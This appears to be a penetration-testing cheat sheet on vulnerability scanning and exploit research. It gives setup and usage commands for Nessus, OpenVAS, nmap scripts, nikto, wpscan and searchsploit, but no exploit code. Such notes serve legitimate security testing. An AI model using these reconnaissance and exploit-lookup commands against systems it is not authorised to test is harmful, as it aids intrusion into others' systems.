Vulnerability

Perform vulnerability scanning and exploit research.

Vulnerability Scanner

Nessus

Vulnerability scanner very powerful.

Runs on port 8834 tcp.

Nessus has two parts (both can be on the same machine):

Client to configure the scan.
Server to perform the scan and send the results to the client.

For Free License register HERE. For Download HERE.

Start & Stop:

systemctl start nessusd
systemctl stop nessusd

net start "Tenable Nessus"
net stop "Tenable Nessus"

Go to: https://<MY_IP>:8834/

Create a local account.

Tool

Details

nussus_downloader.rb

Interactive script for download report ./nessus_downloader.rb

OpenVAS

Vulnerability scanner open-source and free.

Runs on port 8080 tcp.

Like nessus, OpenVAS also has two parts (both can be on the same machine):

Client to configure the scan.
Server to perform the scan and send the results to the client.

sudo apt-get install gvm && openvas

Initialization process (can take up to 30 minutes):

gvm-setup
# note credentials

Start & Stop:

gvm-start
gvm-stop

Go to: https://<MY_IP>:8080/

Tools & Other

Tool

Details

nmap

/usr/share/nmap/scripts/ nmap --script-updatedb nmap --script--help <SCRIPT> nmap --script "<SCRIPT or TYPE>" <IP>

nikto

Server Web Scanner. nikto -h -o <OUTPUT.html> -Format html

wpscan

WordPress Security Scanner. wpscan --url <URL> --random-user-agent -o <OUTPUT> --enumerate p --plugins-detection aggressive --api-token <API_KEY>

Research Exploit

Very important to analyze the exploits found very carefully, they could be harmful!

Tools

Detail

searchsploit

Exploit-db database locally and offline. searchsploit -u (update) searchsploit <STRING> (get ID) searchsploit -w <STRING> (get LINK) searchsploit -x <ID> (see l'exploit) searchsploit -m <ID> (Copy exploit + info)

Last updated 3 months ago